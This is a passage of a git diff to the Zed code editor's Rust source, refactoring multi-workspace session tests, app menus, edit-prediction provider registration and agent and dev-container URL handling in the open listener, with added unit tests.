); language_models::init(app_state.user_store.clone(), app_state.client.clone(), cx); web_search::init(cx); git_graph::init(cx); - web_search_providers::init(app_state.client.clone(), cx); + web_search_providers::init(app_state.client.clone(), app_state.user_store.clone(), cx); let prompt_builder = PromptBuilder::load(app_state.fs.clone(), false, cx); project::AgentRegistryStore::init_global( cx, @@ -5031,9 +5206,9 @@ mod tests { ); agent_ui::init( app_state.fs.clone(), - app_state.client.clone(), - prompt_builder.clone(), + prompt_builder, app_state.languages.clone(), + true, false, cx, ); @@ -5046,7 +5221,7 @@ mod tests { ); project::debugger::dap_store::DapStore::init(&app_state.client.clone().into(), cx); debugger_ui::init(cx); - initialize_workspace(app_state.clone(), prompt_builder, cx); + initialize_workspace(app_state.clone(), cx); search::init(cx); cx.set_global(workspace::PaneSearchBarCallbacks { setup_search_bar: |languages, toolbar, window, cx| { @@ -5336,6 +5511,11 @@ mod tests { let project = project1.clone(); |window, cx| MultiWorkspace::test_new(project, window, cx) }); + window + .update(cx, |multi_workspace, _, cx| { + multi_workspace.open_sidebar(cx); + }) + .unwrap(); cx.run_until_parked(); assert_eq!(cx.windows().len(), 1, "Should start with 1 window"); @@ -5358,17 +5538,17 @@ mod tests { let workspace1 = window .read_with(cx, |multi_workspace, _| { - multi_workspace.workspaces()[0].clone() + multi_workspace.workspaces().next().unwrap().clone() }) .unwrap(); window - .update(cx, |multi_workspace, _, cx| { - multi_workspace.activate(workspace2.clone(), cx); - multi_workspace.activate(workspace3.clone(), cx); + .update(cx, |multi_workspace, window, cx| { + multi_workspace.activate(workspace2.clone(), window, cx); + multi_workspace.activate(workspace3.clone(), window, cx); // Switch back to workspace1 for test setup - multi_workspace.activate(workspace1, cx); - assert_eq!(multi_workspace.active_workspace_index(), 0); + multi_workspace.activate(workspace1.clone(), window, cx); + assert_eq!(multi_workspace.workspace(), &workspace1); }) .unwrap(); @@ -5377,8 +5557,8 @@ mod tests { // Verify setup: 3 workspaces, workspace 0 active, still 1 window window .read_with(cx, |multi_workspace, _| { - assert_eq!(multi_workspace.workspaces().len(), 3); - assert_eq!(multi_workspace.active_workspace_index(), 0); + assert_eq!(multi_workspace.workspaces().count(), 3); + assert_eq!(multi_workspace.workspace(), &workspace1); }) .unwrap(); assert_eq!(cx.windows().len(), 1); @@ -5401,8 +5581,8 @@ mod tests { window .read_with(cx, |multi_workspace, cx| { assert_eq!( - multi_workspace.active_workspace_index(), - 2, + multi_workspace.workspace(), + &workspace3, "Should have switched to workspace 3 which contains /dir3" ); let active_item = multi_workspace @@ -5435,8 +5615,8 @@ mod tests { window .read_with(cx, |multi_workspace, cx| { assert_eq!( - multi_workspace.active_workspace_index(), - 1, + multi_workspace.workspace(), + &workspace2, "Should have switched to workspace 2 which contains /dir2" ); let active_item = multi_workspace @@ -5484,8 +5664,8 @@ mod tests { window .read_with(cx, |multi_workspace, cx| { assert_eq!( - multi_workspace.active_workspace_index(), - 0, + multi_workspace.workspace(), + &workspace1, "Should have switched back to workspace 0 which contains /dir1" ); let active_item = multi_workspace @@ -5535,6 +5715,11 @@ mod tests { let project = project1.clone(); |window, cx| MultiWorkspace::test_new(project, window, cx) }); + window1 + .update(cx, |multi_workspace, _, cx| { + multi_workspace.open_sidebar(cx); + }) + .unwrap(); cx.run_until_parked(); @@ -5549,9 +5734,9 @@ mod tests { .unwrap(); window1 - .update(cx, |multi_workspace, _, cx| { - multi_workspace.activate(workspace1_2.clone(), cx); - multi_workspace.activate(workspace1_1.clone(), cx); + .update(cx, |multi_workspace, window, cx| { + multi_workspace.activate(workspace1_2.clone(), window, cx); + multi_workspace.activate(workspace1_1.clone(), window, cx); }) .unwrap(); @@ -5561,6 +5746,11 @@ mod tests { let project = project3.clone(); |window, cx| MultiWorkspace::test_new(project, window, cx) }); + window2 + .update(cx, |multi_workspace, _, cx| { + multi_workspace.open_sidebar(cx); + }) + .unwrap(); cx.run_until_parked(); assert_eq!(cx.windows().len(), 2); @@ -5595,7 +5785,7 @@ mod tests { // Verify workspace1_1 is active window1 .read_with(cx, |multi_workspace, _| { - assert_eq!(multi_workspace.active_workspace_index(), 0); + assert_eq!(multi_workspace.workspace(), &workspace1_1); }) .unwrap(); @@ -5661,7 +5851,7 @@ mod tests { // Verify workspace1_1 is still active (not workspace1_2 with dirty item) window1 .read_with(cx, |multi_workspace, _| { - assert_eq!(multi_workspace.active_workspace_index(), 0); + assert_eq!(multi_workspace.workspace(), &workspace1_1); }) .unwrap(); @@ -5672,8 +5862,8 @@ mod tests { window1 .read_with(cx, |multi_workspace, _| { assert_eq!( - multi_workspace.active_workspace_index(), - 1, + multi_workspace.workspace(), + &workspace1_2, "Case 2: Non-active workspace should be activated when it has dirty item" ); }) @@ -5781,8 +5971,10 @@ mod tests { #[gpui::test] async fn test_multi_workspace_session_restore(cx: &mut TestAppContext) { use collections::HashMap; + use project::ProjectGroupKey; use session::Session; - use workspace::{Workspace, WorkspaceId}; + use util::path_list::PathList; + use workspace::{OpenMode, Workspace, WorkspaceId}; let app_state = init_test(cx); @@ -5807,47 +5999,83 @@ mod tests { // // Window A: workspace for dir1, workspace for dir2 // Window B: workspace for dir3 - let (window_a, _) = cx + let workspace::OpenResult { + window: window_a, .. + } = cx .update(|cx| { - Workspace::new_local(vec![dir1.into()], app_state.clone(), None, None, None, cx) + Workspace::new_local( + vec![dir1.into()], + app_state.clone(), + None, + None, + None, + OpenMode::Activate, + cx, + ) }) .await .expect("failed to open first workspace"); + window_a + .update(cx, |multi_workspace, _, cx| { + multi_workspace.open_sidebar(cx); + }) + .unwrap(); + window_a .update(cx, |multi_workspace, window, cx| { - multi_workspace.open_project(vec![dir2.into()], window, cx) + multi_workspace.open_project(vec![dir2.into()], OpenMode::Activate, window, cx) }) .unwrap() .await .expect("failed to open second workspace into window A"); cx.run_until_parked(); - let (window_b, _) = cx + let workspace::OpenResult { + window: window_b, .. + } = cx .update(|cx| { - Workspace::new_local(vec![dir3.into()], app_state.clone(), None, None, None, cx) + Workspace::new_local( + vec![dir3.into()], + app_state.clone(), + None, + None, + None, + OpenMode::Activate, + cx, + ) }) .await .expect("failed to open third workspace"); + window_b + .update(cx, |multi_workspace, _, cx| { + multi_workspace.open_sidebar(cx); + }) + .unwrap(); + // Currently dir2 is active because it was added last. // So, switch window_a's active workspace to dir1 (index 0). // This sets up a non-trivial assertion: after restore, dir1 should // still be active rather than whichever workspace happened to restore last. window_a .update(cx, |multi_workspace, window, cx| { - multi_workspace.activate_index(0, window, cx); + let workspace = multi_workspace.workspaces().next().unwrap().clone(); + multi_workspace.activate(workspace, window, cx); }) .unwrap(); - // --- Flush serialization --- - cx.executor().advance_clock(SERIALIZATION_THROTTLE_TIME); + cx.run_until_parked(); + flush_workspace_serialization(&window_a, cx).await; + flush_workspace_serialization(&window_b, cx).await; cx.run_until_parked(); // Verify all workspaces retained their session_ids. - let locations = workspace::last_session_workspace_locations(&session_id, None, fs.as_ref()) - .await - .expect("expected session workspace locations"); + let db = cx.update(|cx| workspace::WorkspaceDb::global(cx)); + let locations = + workspace::last_session_workspace_locations(&db, &session_id, None, fs.as_ref()) + .await + .expect("expected session workspace locations"); assert_eq!( locations.len(), 3, @@ -5874,9 +6102,10 @@ mod tests { }); // --- Read back from DB and verify grouping --- - let locations = workspace::last_session_workspace_locations(&session_id, None, fs.as_ref()) - .await - .expect("expected session workspace locations"); + let locations = + workspace::last_session_workspace_locations(&db, &session_id, None, fs.as_ref()) + .await + .expect("expected session workspace locations"); assert_eq!(locations.len(), 3, "expected 3 session workspaces"); @@ -5916,94 +6145,50 @@ mod tests { .filter_map(|window| window.downcast::()) .collect() }); + assert_eq!(restored_windows.len(), 2,); + + // Identify restored windows by their active workspace root paths. + let (restored_a, restored_b) = { + let (mut with_dir1, mut with_dir3) = (None, None); + for window in &restored_windows { + let active_paths = window + .read_with(cx, |mw, cx| mw.workspace().read(cx).root_paths(cx)) + .unwrap(); + if active_paths.iter().any(|p| p.as_ref() == Path::new(dir1)) { + with_dir1 = Some(window); + } else { + with_dir3 = Some(window); + } + } + ( + with_dir1.expect("expected a window with dir1 active"), + with_dir3.expect("expected a window with dir3 active"), + ) + }; - assert_eq!( - restored_windows.len(), - 2, - "expected 2 restored windows, got {}", - restored_windows.len() - ); - - let workspace_counts: Vec = restored_windows - .iter() - .map(|window| { - window - .read_with(cx, |multi_workspace, _| multi_workspace.workspaces().len()) - .unwrap() - }) - .collect(); - let mut sorted_counts = workspace_counts.clone(); - sorted_counts.sort(); - assert_eq!( - sorted_counts, - vec![1, 2], - "expected one window with 1 workspace and one with 2, got {workspace_counts:?}" - ); - - let dir1_path: Arc = Path::new(dir1).into(); - let dir2_path: Arc = Path::new(dir2).into(); - let dir3_path: Arc = Path::new(dir3).into(); - - let all_restored_paths: Vec>>> = restored_windows - .iter() - .map(|window| { - window - .read_with(cx, |multi_workspace, cx| { - multi_workspace - .workspaces() - .iter() - .map(|ws| ws.read(cx).root_paths(cx)) - .collect() - }) - .unwrap() + // Window A (dir1+dir2): 1 workspace restored, but 2 project group keys. + restored_a + .read_with(cx, |mw, _| { + assert_eq!( + mw.project_group_keys().cloned().collect::>(), + vec![ + ProjectGroupKey::new(None, PathList::new(&[dir1])), + ProjectGroupKey::new(None, PathList::new(&[dir2])), + ] + ); + assert_eq!(mw.workspaces().count(), 1); }) - .collect(); - - let two_ws_window = all_restored_paths - .iter() - .find(|paths| paths.len() == 2) - .expect("expected a window with 2 workspaces"); - assert!( - two_ws_window.iter().any(|p| p.contains(&dir1_path)), - "2-workspace window should contain dir1, got {two_ws_window:?}" - ); - assert!( - two_ws_window.iter().any(|p| p.contains(&dir2_path)), - "2-workspace window should contain dir2, got {two_ws_window:?}" - ); - - let one_ws_window = all_restored_paths - .iter() - .find(|paths| paths.len() == 1) - .expect("expected a window with 1 workspace"); - assert!( - one_ws_window[0].contains(&dir3_path), - "1-workspace window should contain dir3, got {one_ws_window:?}" - ); - - // --- Verify the active workspace is preserved --- - for window in &restored_windows { - let (active_paths, workspace_count) = window - .read_with(cx, |multi_workspace, cx| { - let active = multi_workspace.workspace(); - ( - active.read(cx).root_paths(cx), - multi_workspace.workspaces().len(), - ) - }) - .unwrap(); + .unwrap(); - if workspace_count == 2 { - assert!( - active_paths.contains(&dir1_path), - "2-workspace window should have dir1 active, got {active_paths:?}" - ); - } else { - assert!( - active_paths.contains(&dir3_path), - "1-workspace window should have dir3 active, got {active_paths:?}" + // Window B (dir3): 1 workspace, 1 project group key. + restored_b + .read_with(cx, |mw, _| { + assert_eq!( + mw.project_group_keys().cloned().collect::>(), + vec![ProjectGroupKey::new(None, PathList::new(&[dir3]))] ); - } - } + assert_eq!(mw.workspaces().count(), 1); + }) + .unwrap(); } } diff --git a/crates/zed/src/zed/app_menus.rs b/crates/zed/src/zed/app_menus.rs index debcb605f222dc7c983b9d061803720df5ff727c..3edbcad2d81d63b56e777218a3db5e57a42de7bc 100644 --- a/crates/zed/src/zed/app_menus.rs +++ b/crates/zed/src/zed/app_menus.rs @@ -31,6 +31,7 @@ pub fn app_menus(cx: &mut App) -> Vec { MenuItem::action("Toggle All Docks", workspace::ToggleAllDocks), MenuItem::submenu(Menu { name: "Editor Layout".into(), + disabled: false, items: vec![ MenuItem::action("Split Up", workspace::SplitUp::default()), MenuItem::action("Split Down", workspace::SplitDown::default()), @@ -60,39 +61,31 @@ pub fn app_menus(cx: &mut App) -> Vec { vec![ Menu { name: "Zed".into(), + disabled: false, items: vec![ MenuItem::action("About Zed", zed_actions::About), MenuItem::action("Check for Updates", auto_update::Check), MenuItem::separator(), - MenuItem::submenu(Menu { - name: "Settings".into(), - items: vec![ - MenuItem::action("Open Settings", zed_actions::OpenSettings), - MenuItem::action("Open Settings File", super::OpenSettingsFile), - MenuItem::action("Open Project Settings", zed_actions::OpenProjectSettings), - MenuItem::action( - "Open Project Settings File", - super::OpenProjectSettingsFile, - ), - MenuItem::action("Open Default Settings", super::OpenDefaultSettings), - MenuItem::separator(), - MenuItem::action("Open Keymap", zed_actions::OpenKeymap), - MenuItem::action("Open Keymap File", zed_actions::OpenKeymapFile), - MenuItem::action( - "Open Default Key Bindings", - zed_actions::OpenDefaultKeymap, - ), - MenuItem::separator(), - MenuItem::action( - "Select Theme...", - zed_actions::theme_selector::Toggle::default(), - ), - MenuItem::action( - "Select Icon Theme...", - zed_actions::icon_theme_selector::Toggle::default(), - ), - ], - }), + MenuItem::submenu(Menu::new("Settings").items([ + MenuItem::action("Open Settings", zed_actions::OpenSettings), + MenuItem::action("Open Settings File", super::OpenSettingsFile), + MenuItem::action("Open Project Settings", zed_actions::OpenProjectSettings), + MenuItem::action("Open Project Settings File", super::OpenProjectSettingsFile), + MenuItem::action("Open Default Settings", super::OpenDefaultSettings), + MenuItem::separator(), + MenuItem::action("Open Keymap", zed_actions::OpenKeymap), + MenuItem::action("Open Keymap File", zed_actions::OpenKeymapFile), + MenuItem::action("Open Default Key Bindings", zed_actions::OpenDefaultKeymap), + MenuItem::separator(), + MenuItem::action( + "Select Theme...", + zed_actions::theme_selector::Toggle::default(), + ), + MenuItem::action( + "Select Icon Theme...", + zed_actions::icon_theme_selector::Toggle::default(), + ), + ])), MenuItem::separator(), #[cfg(target_os = "macos")] MenuItem::os_submenu("Services", gpui::SystemMenuType::Services), @@ -113,6 +106,7 @@ pub fn app_menus(cx: &mut App) -> Vec { }, Menu { name: "File".into(), + disabled: false, items: vec![ MenuItem::action("New", workspace::NewFile), MenuItem::action("New Window", workspace::NewWindow), @@ -125,7 +119,7 @@ pub fn app_menus(cx: &mut App) -> Vec { } else { "Open…" }, - workspace::Open, + workspace::Open::default(), ), MenuItem::action( "Open Recent...", @@ -160,6 +154,7 @@ pub fn app_menus(cx: &mut App) -> Vec { }, Menu { name: "Edit".into(), + disabled: false, items: vec![ MenuItem::os_action("Undo", editor::actions::Undo, OsAction::Undo), MenuItem::os_action("Redo", editor::actions::Redo, OsAction::Redo), @@ -180,6 +175,7 @@ pub fn app_menus(cx: &mut App) -> Vec { }, Menu { name: "Selection".into(), + disabled: false, items: vec![ MenuItem::os_action( "Select All", @@ -227,10 +223,12 @@ pub fn app_menus(cx: &mut App) -> Vec { }, Menu { name: "View".into(), + disabled: false, items: view_items, }, Menu { name: "Go".into(), + disabled: false, items: vec![ MenuItem::action("Back", workspace::GoBack), MenuItem::action("Forward", workspace::GoForward), @@ -262,6 +260,7 @@ pub fn app_menus(cx: &mut App) -> Vec { }, Menu { name: "Run".into(), + disabled: false, items: vec![ MenuItem::action( "Spawn Task", @@ -286,6 +285,7 @@ pub fn app_menus(cx: &mut App) -> Vec { }, Menu { name: "Window".into(), + disabled: false, items: vec![ MenuItem::action("Minimize", super::Minimize), MenuItem::action("Zoom", super::Zoom), @@ -294,6 +294,7 @@ pub fn app_menus(cx: &mut App) -> Vec { }, Menu { name: "Help".into(), + disabled: false, items: vec![ MenuItem::action( "View Release Notes Locally", diff --git a/crates/zed/src/zed/edit_prediction_registry.rs b/crates/zed/src/zed/edit_prediction_registry.rs index 9381dae22b055b4bd008ee63d0d283581bd513f4..d09dc07af839a681cea96d43217c4217927864d5 100644 --- a/crates/zed/src/zed/edit_prediction_registry.rs +++ b/crates/zed/src/zed/edit_prediction_registry.rs @@ -2,20 +2,18 @@ use client::{Client, UserStore}; use codestral::{CodestralEditPredictionDelegate, load_codestral_api_key}; use collections::HashMap; use copilot::CopilotEditPredictionDelegate; -use edit_prediction::{EditPredictionModel, ZedEditPredictionDelegate, Zeta2FeatureFlag}; +use edit_prediction::{EditPredictionModel, ZedEditPredictionDelegate}; use editor::Editor; -use feature_flags::FeatureFlagAppExt; use gpui::{AnyWindowHandle, App, AppContext as _, Context, Entity, WeakEntity}; use language::language_settings::{EditPredictionProvider, all_language_settings}; -use settings::{ - EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME, EditPredictionPromptFormat, SettingsStore, -}; +use settings::{EditPredictionPromptFormat, SettingsStore}; use std::{cell::RefCell, rc::Rc, sync::Arc}; -use supermaven::{Supermaven, SupermavenEditPredictionDelegate}; use ui::Window; pub fn init(client: Arc, user_store: Entity, cx: &mut App) { + edit_prediction::EditPredictionStore::global(&client, &user_store, cx); + let editors: Rc, AnyWindowHandle>>> = Rc::default(); cx.observe_new({ let editors = editors.clone(); @@ -80,9 +78,6 @@ pub fn init(client: Arc, user_store: Entity, cx: &mut App) { .detach(); cx.observe_global::({ - let editors = editors.clone(); - let client = client.clone(); - let user_store = user_store.clone(); let mut previous_config = edit_prediction_provider_config_for_settings(cx); move |cx| { let new_provider_config = edit_prediction_provider_config_for_settings(cx); @@ -106,24 +101,6 @@ pub fn init(client: Arc, user_store: Entity, cx: &mut App) { } }) .detach(); - - cx.observe_flag::({ - let mut previous_config = edit_prediction_provider_config_for_settings(cx); - move |_is_enabled, cx| { - let new_provider_config = edit_prediction_provider_config_for_settings(cx); - if new_provider_config != previous_config { - previous_config = new_provider_config; - assign_edit_prediction_providers( - &editors, - new_provider_config, - &client, - user_store.clone(), - cx, - ); - } - } - }) - .detach(); } fn edit_prediction_provider_config_for_settings(cx: &App) -> Option { @@ -132,10 +109,9 @@ fn edit_prediction_provider_config_for_settings(cx: &App) -> Option None, EditPredictionProvider::Copilot => Some(EditPredictionProviderConfig::Copilot), - EditPredictionProvider::Supermaven => Some(EditPredictionProviderConfig::Supermaven), - EditPredictionProvider::Zed => Some(EditPredictionProviderConfig::Zed( - EditPredictionModel::Zeta1, - )), + EditPredictionProvider::Zed => { + Some(EditPredictionProviderConfig::Zed(EditPredictionModel::Zeta)) + } EditPredictionProvider::Codestral => Some(EditPredictionProviderConfig::Codestral), EditPredictionProvider::Ollama | EditPredictionProvider::OpenAiCompatibleApi => { let custom_settings = if provider == EditPredictionProvider::Ollama { @@ -154,33 +130,22 @@ fn edit_prediction_provider_config_for_settings(cx: &App) -> Option Some(EditPredictionProviderConfig::Zed( - EditPredictionModel::Sweep, - )), + EditPredictionProvider::Mercury => Some(EditPredictionProviderConfig::Zed( EditPredictionModel::Mercury, )), - EditPredictionProvider::Experimental(name) => { - if name == EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME - && cx.has_flag::() - { - Some(EditPredictionProviderConfig::Zed( - EditPredictionModel::Zeta2, - )) - } else { - None - } - } + EditPredictionProvider::Experimental(_) => None, } } @@ -204,7 +169,6 @@ fn infer_prompt_format(model: &str) -> Option { #[derive(Copy, Clone, PartialEq, Eq)] enum EditPredictionProviderConfig { Copilot, - Supermaven, Codestral, Zed(EditPredictionModel), } @@ -213,13 +177,10 @@ impl EditPredictionProviderConfig { fn name(&self) -> &'static str { match self { EditPredictionProviderConfig::Copilot => "Copilot", - EditPredictionProviderConfig::Supermaven => "Supermaven", EditPredictionProviderConfig::Codestral => "Codestral", EditPredictionProviderConfig::Zed(model) => match model { - EditPredictionModel::Zeta1 => "Zeta1", - EditPredictionModel::Zeta2 => "Zeta2", + EditPredictionModel::Zeta => "Zeta", EditPredictionModel::Fim { .. } => "FIM", - EditPredictionModel::Sweep => "Sweep", EditPredictionModel::Mercury => "Mercury", }, } @@ -306,12 +267,6 @@ fn assign_edit_prediction_provider( editor.set_edit_prediction_provider(Some(provider), window, cx); } } - Some(EditPredictionProviderConfig::Supermaven) => { - if let Some(supermaven) = Supermaven::global(cx) { - let provider = cx.new(|_| SupermavenEditPredictionDelegate::new(supermaven)); - editor.set_edit_prediction_provider(Some(provider), window, cx); - } - } Some(EditPredictionProviderConfig::Codestral) => { let http_client = client.http_client(); let provider = cx.new(|_| CodestralEditPredictionDelegate::new(http_client)); @@ -321,26 +276,23 @@ fn assign_edit_prediction_provider( let ep_store = edit_prediction::EditPredictionStore::global(client, &user_store, cx); if let Some(project) = editor.project() { - let has_model = ep_store.update(cx, |ep_store, cx| { + ep_store.update(cx, |ep_store, cx| { ep_store.set_edit_prediction_model(model); if let Some(buffer) = &singleton_buffer { ep_store.register_buffer(buffer, project, cx); } - true }); - if has_model { - let provider = cx.new(|cx| { - ZedEditPredictionDelegate::new( - project.clone(), - singleton_buffer, - &client, - &user_store, - cx, - ) - }); - editor.set_edit_prediction_provider(Some(provider), window, cx); - } + let provider = cx.new(|cx| { + ZedEditPredictionDelegate::new( + project.clone(), + singleton_buffer, + &client, + &user_store, + cx, + ) + }); + editor.set_edit_prediction_provider(Some(provider), window, cx); } } } @@ -361,7 +313,12 @@ mod tests { let app_state = cx.update(|cx| { let app_state = AppState::test(cx); client::init(&app_state.client, cx); - language_model::init(app_state.client.clone(), cx); + language_model::init(cx); + client::RefreshLlmTokenListener::register( + app_state.client.clone(), + app_state.user_store.clone(), + cx, + ); editor::init(cx); app_state }); diff --git a/crates/zed/src/zed/migrate.rs b/crates/zed/src/zed/migrate.rs index f8bec397f1cf54fe37962c6a318a816a3158423e..f7d320a0814f17c47298f0d903800c5a98e353f1 100644 --- a/crates/zed/src/zed/migrate.rs +++ b/crates/zed/src/zed/migrate.rs @@ -11,7 +11,7 @@ use std::sync::Arc; use gpui::{Entity, EventEmitter, Global, Task, TextStyle, TextStyleRefinement}; use markdown::{Markdown, MarkdownElement, MarkdownStyle}; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::prelude::*; use workspace::item::ItemHandle; use workspace::{ToolbarItemEvent, ToolbarItemLocation, ToolbarItemView, Workspace}; diff --git a/crates/zed/src/zed/open_listener.rs b/crates/zed/src/zed/open_listener.rs index a7d1da663b3da6848d3552707f261fe02beba56b..0a302291cacc8caa9e0618da00b8d7c6370ccf0e 100644 --- a/crates/zed/src/zed/open_listener.rs +++ b/crates/zed/src/zed/open_listener.rs @@ -1,10 +1,11 @@ use crate::handle_open_request; use crate::restore_or_create_workspace; +use agent_ui::ExternalSourcePrompt; use anyhow::{Context as _, Result, anyhow}; use cli::{CliRequest, CliResponse, ipc::IpcSender}; use cli::{IpcHandshake, ipc}; use client::{ZedLink, parse_zed_link}; -use db::kvp::KEY_VALUE_STORE; +use db::kvp::KeyValueStore; use editor::Editor; use fs::Fs; use futures::channel::mpsc::{UnboundedReceiver, UnboundedSender}; @@ -28,7 +29,7 @@ use util::ResultExt; use util::paths::PathWithPosition; use workspace::PathList; use workspace::item::ItemHandle; -use workspace::{AppState, MultiWorkspace, OpenOptions, SerializedWorkspaceLocation}; +use workspace::{AppState, MultiWorkspace, OpenOptions, OpenResult, SerializedWorkspaceLocation}; #[derive(Default, Debug)] pub struct OpenRequest { @@ -36,6 +37,7 @@ pub struct OpenRequest { pub open_paths: Vec, pub diff_paths: Vec<[String; 2]>, pub diff_all: bool, + pub dev_container: bool, pub open_channel_notes: Vec<(u64, Option)>, pub join_channel: Option, pub remote_connection: Option, @@ -48,7 +50,7 @@ pub enum OpenRequestKind { extension_id: String, }, AgentPanel { - initial_prompt: Option, + external_source_prompt: Option, }, SharedAgentThread { session_id: String, @@ -77,6 +79,7 @@ impl OpenRequest { this.diff_paths = request.diff_paths; this.diff_all = request.diff_all; + this.dev_container = request.dev_container; if let Some(wsl) = request.wsl { let (user, distro_name) = if let Some((user, distro)) = wsl.split_once('@') { if user.is_empty() { @@ -110,8 +113,6 @@ impl OpenRequest { this.kind = Some(OpenRequestKind::Extension { extension_id: extension_id.to_string(), }); - } else if let Some(agent_path) = url.strip_prefix("zed://agent") { - this.parse_agent_url(agent_path) } else if let Some(session_id_str) = url.strip_prefix("zed://agent/shared/") { if uuid::Uuid::parse_str(session_id_str).is_ok() { this.kind = Some(OpenRequestKind::SharedAgentThread { @@ -120,6 +121,8 @@ impl OpenRequest { } else { log::error!("Invalid session ID in URL: {}", session_id_str); } + } else if let Some(agent_path) = url.strip_prefix("zed://agent") { + this.parse_agent_url(agent_path) } else if let Some(schema_path) = url.strip_prefix("zed://schemas/") { this.kind = Some(OpenRequestKind::BuiltinJsonSchema { schema_path: schema_path.to_string(), @@ -164,13 +167,14 @@ impl OpenRequest { fn parse_agent_url(&mut self, agent_path: &str) { // Format: "" or "?prompt=" - let initial_prompt = agent_path.strip_prefix('?').and_then(|query| { + let external_source_prompt = agent_path.strip_prefix('?').and_then(|query| { url::form_urlencoded::parse(query.as_bytes()) .find_map(|(key, value)| (key == "prompt").then_some(value)) - .filter(|s| !s.is_empty()) - .map(|s| s.into_owned()) + .and_then(|prompt| ExternalSourcePrompt::new(prompt.as_ref())) + }); + self.kind = Some(OpenRequestKind::AgentPanel { + external_source_prompt, }); - self.kind = Some(OpenRequestKind::AgentPanel { initial_prompt }); } fn parse_git_clone_url(&mut self, clone_path: &str) -> Result<()> { @@ -254,6 +258,7 @@ pub struct RawOpenRequest { pub urls: Vec, pub diff_paths: Vec<[String; 2]>, pub diff_all: bool, + pub dev_container: bool, pub wsl: Option, } @@ -343,7 +348,11 @@ pub async fn open_paths_with_positions( .map(|path_with_position| path_with_position.path.clone()) .collect::>(); - let (multi_workspace, mut items) = cx + let OpenResult { + window: multi_workspace, + opened_items: mut items, + .. + } = cx .update(|cx| workspace::open_paths(&paths, app_state, open_options, cx)) .await?; @@ -407,6 +416,7 @@ pub async fn handle_cli_connection( reuse, env, user_data_dir: _, + dev_container, } => { if !urls.is_empty() { cx.update(|cx| { @@ -415,6 +425,7 @@ pub async fn handle_cli_connection( urls, diff_paths, diff_all, + dev_container, wsl, }, cx, @@ -444,6 +455,7 @@ pub async fn handle_cli_connection( reuse, &responses, wait, + dev_container, app_state.clone(), env, cx, @@ -465,6 +477,7 @@ async fn open_workspaces( reuse: bool, responses: &IpcSender, wait: bool, + dev_container: bool, app_state: Arc, env: Option>, cx: &mut AsyncApp, @@ -485,7 +498,8 @@ async fn open_workspaces( if grouped_locations.is_empty() { // If we have no paths to open, show the welcome screen if this is the first launch - if matches!(KEY_VALUE_STORE.read_kvp(FIRST_OPEN), Ok(None)) { + let kvp = cx.update(|cx| KeyValueStore::global(cx)); + if matches!(kvp.read_kvp(FIRST_OPEN), Ok(None)) { cx.update(|cx| show_onboarding_view(app_state, cx).detach()); } // If not the first launch, show an empty window with empty editor @@ -522,9 +536,10 @@ async fn open_workspaces( }; let open_options = workspace::OpenOptions { open_new_workspace, - replace_window, + requesting_window: replace_window, wait, env: env.clone(), + open_in_dev_container: dev_container, ..Default::default() }; @@ -772,6 +787,137 @@ mod tests { assert_eq!(request.open_paths, vec!["/"]); } + #[gpui::test] + fn test_parse_agent_url(cx: &mut TestAppContext) { + let _app_state = init_test(cx); + + let request = cx.update(|cx| { + OpenRequest::parse( + RawOpenRequest { + urls: vec!["zed://agent".into()], + ..Default::default() + }, + cx, + ) + .unwrap() + }); + + match request.kind { + Some(OpenRequestKind::AgentPanel { + external_source_prompt, + }) => { + assert_eq!(external_source_prompt, None); + } + _ => panic!("Expected AgentPanel kind"), + } + } + + fn agent_url_with_prompt(prompt: &str) -> String { + let mut serializer = url::form_urlencoded::Serializer::new("zed://agent?".to_string()); + serializer.append_pair("prompt", prompt); + serializer.finish() + } + + #[gpui::test] + fn test_parse_agent_url_with_prompt(cx: &mut TestAppContext) { + let _app_state = init_test(cx); + let prompt = "Write me a script\nThanks"; + + let request = cx.update(|cx| { + OpenRequest::parse( + RawOpenRequest { + urls: vec![agent_url_with_prompt(prompt)], + ..Default::default() + }, + cx, + ) + .unwrap() + }); + + match request.kind { + Some(OpenRequestKind::AgentPanel { + external_source_prompt, + }) => { + assert_eq!( + external_source_prompt + .as_ref() + .map(ExternalSourcePrompt::as_str), + Some("Write me a script\nThanks") + ); + } + _ => panic!("Expected AgentPanel kind"), + } + } + + #[gpui::test] + fn test_parse_agent_url_with_empty_prompt(cx: &mut TestAppContext) { + let _app_state = init_test(cx); + + let request = cx.update(|cx| { + OpenRequest::parse( + RawOpenRequest { + urls: vec![agent_url_with_prompt("")], + ..Default::default() + }, + cx, + ) + .unwrap() + }); + + match request.kind { + Some(OpenRequestKind::AgentPanel { + external_source_prompt, + }) => { + assert_eq!(external_source_prompt, None); + } + _ => panic!("Expected AgentPanel kind"), + } + } + + #[gpui::test] + fn test_parse_shared_agent_thread_url(cx: &mut TestAppContext) { + let _app_state = init_test(cx); + let session_id = "123e4567-e89b-12d3-a456-426614174000"; + + let request = cx.update(|cx| { + OpenRequest::parse( + RawOpenRequest { + urls: vec![format!("zed://agent/shared/{session_id}")], + ..Default::default() + }, + cx, + ) + .unwrap() + }); + + match request.kind { + Some(OpenRequestKind::SharedAgentThread { + session_id: parsed_session_id, + }) => { + assert_eq!(parsed_session_id, session_id); + } + _ => panic!("Expected SharedAgentThread kind"), + } + } + + #[gpui::test] + fn test_parse_shared_agent_thread_url_with_invalid_uuid(cx: &mut TestAppContext) { + let _app_state = init_test(cx); + + let request = cx.update(|cx| { + OpenRequest::parse( + RawOpenRequest { + urls: vec!["zed://agent/shared/not-a-uuid".into()], + ..Default::default() + }, + cx, + ) + .unwrap() + }); + + assert!(request.kind.is_none()); + } + #[gpui::test] fn test_parse_git_commit_url(cx: &mut TestAppContext) { let _app_state = init_test(cx); @@ -1154,7 +1300,7 @@ mod tests { vec![], false, workspace::OpenOptions { - replace_window: Some(window_to_replace), + requesting_window: Some(window_to_replace), ..Default::default() }, &response_tx, @@ -1407,4 +1553,123 @@ mod tests { }) .unwrap(); } + + #[gpui::test] + async fn test_dev_container_flag_opens_modal(cx: &mut TestAppContext) { + let app_state = init_test(cx); + cx.update(|cx| recent_projects::init(cx)); + + app_state + .fs + .as_fake() + .insert_tree( + path!("/project"), + json!({ + ".devcontainer": { + "devcontainer.json": "{}" + }, + "src": { + "main.rs": "fn main() {}" + } + }), + ) + .await; + + let (response_tx, _) = ipc::channel::().unwrap(); + let errored = cx + .spawn({ + let app_state = app_state.clone(); + |mut cx| async move { + open_local_workspace( + vec![path!("/project").to_owned()], + vec![], + false, + workspace::OpenOptions { + 